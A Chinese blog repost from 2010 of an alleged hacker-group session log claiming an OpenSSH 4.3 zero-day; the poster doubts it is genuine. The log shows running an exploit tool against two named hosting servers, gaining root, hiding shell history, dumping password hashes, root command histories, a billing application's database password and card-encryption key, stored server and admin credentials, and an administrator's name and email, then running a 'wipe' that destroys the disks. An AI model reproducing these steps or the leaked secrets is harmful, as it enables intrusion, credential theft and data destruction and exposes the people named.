0day-openssh-remote-exploit

Hack 2010-05-24

openssh 4.3 可是 redhat enterprise linux 5.3 的标配，文中的两个 tgz 也无法下载了。不知真假，仅供娱乐。

anti-sec:~/pwn# ./map ssanz.net

IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22

  [+] 0wn0wn – anti-sec group
  [+] Target: 66.197.143.133
  [+] SSH Port: 22

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata
#1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::

sh-3.2# w
03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 3008
drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
-rw-------  1 root     root         957 Jun 13 07:24 .accesshash
-rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
-rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
-rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
-rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
-rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
-rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
-rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
-rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
drwx------  2 root     root        4096 Jun  1 13:54 .elinks
-rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
-rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
drwx------  3 root     root        4096 Jun  1 10:39 .gconf
drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
-rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
-rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
-rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------  2 root     root        4096 Jun  2 06:41 .ssh
-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups

sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {'print $5'} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {'print $5'} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j Drop
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j Drop
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j Drop
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install

sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
-rw-------   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
drwx------   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx------   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/

sh-3.2# ls
admin                 banned.php             configuressl.php
domainchecker.php  init.php             logout.php
postinfo.html       templates        viewticket.php  whois.php
affiliates.php        billing                contact.php
downloads          installmingchowping  modules
_private            templates_c      _vti_bin
aff.php               cart.php               creditcard.php
downloads.php      knowledgebase.php    networkissues.php
register.php        tutorials.php    _vti_cnf
announcements.php     cgi-bin                dbconnect.php
htaccess.txt       lang                 networkissuesrss.php
serverstatus.php    upgrade          _vti_inf.html
announcementsrss.php  clientarea.php         display.php
images             libs                 order.php
status              upgrade.php      _vti_log
announcements.xml     configuration.php      dl.php
includes           link.php             passwordreminder.php
submitticket.php    viewemail.php    _vti_pvt
attachments           configuration.php.new  dologin.php
index.php          login.php            pipe
supporttickets.php  viewinvoice.php  _vti_txt

sh-3.2# cat configuration.php
<?php
$license=”93881365561d”;
$db_host = “localhost”;
$db_username = “billing_billusr”;
$db_password = “X2qL6:qWCCb6″;
$db_name = “billing_billing”;
$cc_encryption_hash =
“57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K”;
$templates_compiledir = “templates_c/”;
?>

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use billing_billing;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+—————————-+
| Tables_in_billing_billing  |
+—————————-+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+—————————-+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from tblservers;
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| name         | ipaddress      | hostname         | username |
password
     |
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    |
J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=
     |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     |
+V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF
8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     |
n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
     |
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from tbladmins;
+———–+———-+—————–+———-+—————
- ——————-+
| firstname | lastname | email           | username | password
                   |
+———–+———-+—————–+———-+—————
- ——————-+
| Logan     | Douglas  | Logan@ssanz.net | Admin    |
c6df529826cf16ac5bedb424d8ac972b |
+———–+———-+—————–+———-+—————
- ——————-+
1 row in set (0.06 sec)

mysql> quit
Bye
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup

sh-3.2# exit
exit

- ———————————–

osiris   [ DOWN ]
devil   [  UP  ]

- ———————————–

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

  [+] 0wn0wn – anti-sec group
  [+] Target: 66.197.204.101
  [+] SSH Port: 22

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::

sh-3.2# w
04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root   4096 Jul  4 04:06 .
drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
-rw-------  1 root root    957 Jun 13 05:20 .accesshash
-rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
-rw-------  1 root root   7258 Jun 30 10:03 .bash_history
-rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
-rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
-rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
-rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
-rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
drwx------  2 root root   4096 Jun 12 01:51 .elinks
-rw-r--r--  1 root root     16 Jun 13 15:33 .forward
drwx------  3 root root   4096 Jun 11 23:59 .gconf
drwx------  2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
drwx------  2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
-rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
-rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
-rw-------  1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
-rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
-rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
-rw-------  1 root root   1024 Jun 12 02:50 .rnd
drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
drwx------  2 root root   4096 Jun 22 09:11 .ssh
-rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso

sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# exit
exit